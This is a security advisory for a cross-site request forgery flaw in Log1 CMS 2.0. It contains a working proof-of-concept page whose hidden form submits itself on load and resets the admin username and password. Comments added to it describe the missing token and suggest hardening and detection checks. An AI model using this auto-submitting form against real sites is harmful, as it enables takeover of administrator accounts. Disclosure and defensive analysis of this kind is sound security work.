Log1 CMS version 2.0 suffers from a cross-site request forgery (CSRF) vulnerability.
e8537ae030f9b8994517fa0faf86acc754535442cfb6f11e037c41d9eba00051
<!------------------------------------------------------------------------
# Software................Log1 CMS 2.0
# Vulnerability...........Cross-site Request Forgery
# Download................http://log1cms.sourceforge.net/
# Release Date............7/5/2010
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................John Leitch
# Site....................http://cross-site-scripting.blogspot.com/
# Email...................john.leitch5@gmail.com
# ------------------------------------------------------------------------
#
# --Description--
#
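# A cross-site request forgery vulnerability in Log1 CMS 2.0 can be
# exploited to change the admin username and password. The form posted
# below contains no anti-CSRF token, so the request is accepted when it
# is sent from the browser of a logged-in administrator.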
#
#
# --PoC-->
<!-- Proof-of-concept page from the advisory: one auto-submitting form that
     sends the Log1 CMS 2.0 admin request from a page outside the application.
     Defender's reading: every field below is a static, predictable value and
     none of them is a per-session secret (there is no anti-CSRF token), so the
     server cannot tell this submission apart from one made through its own
     admin page. Things to verify in a fixed or hardened install: a per-session
     token validated on this action, a SameSite attribute on the admin session
     cookie, and re-entry of the current password before credentials change.
     Detection hint: a POST to this action whose Origin or Referer header does
     not match the site itself is worth alerting on. -->
<html>
<!-- onload submits the first form once the page has loaded; no click is required. -->
<body onload="document.forms[0].submit()">
<!-- State-changing POST to the admin script. The host is localhost, which matches
     the author's stated test setup (Windows Vista + XAMPP). -->
<form method="POST" action="http://localhost/log1cms2.0/admin/main.php?action=step1">
<!-- Site metadata and appearance fields; these look like the values of what
     appears to be the site settings form, resubmitted alongside the credentials. -->
<input type="hidden" name="title" value="log1 CMS" />
<input type="hidden" name="desc" value="log1cms official page" />
<input type="hidden" name="key" value="log1, log 1, CMS, content managment system" />
<input type="hidden" name="language" value="0" />
<input type="hidden" name="bgcolor" value="#ffffff" />
<input type="hidden" name="textcolor" value="#999999" />
<input type="hidden" name="specialcolor" value="#000000" />
<!-- Credential fields: per the advisory description, these are the admin
     username and password that the forged request overwrites. -->
<input type="hidden" name="login" value="admin" />
<input type="hidden" name="pass" value="Password1" />
<!-- NOTE(review): isMd5 presumably tells the server how to treat the pass value;
     its handling is not shown on this page, so confirm against the application source. -->
<input type="hidden" name="isMd5" value="1" />
<input type="hidden" name="google_login" value="gerard.caplain" />
<input type="hidden" name="email" value="log_1[ at ]users.sourceforge.net" />
<input type="hidden" name="copyright" value="2010 by log1" />
</form>
</body>
</html>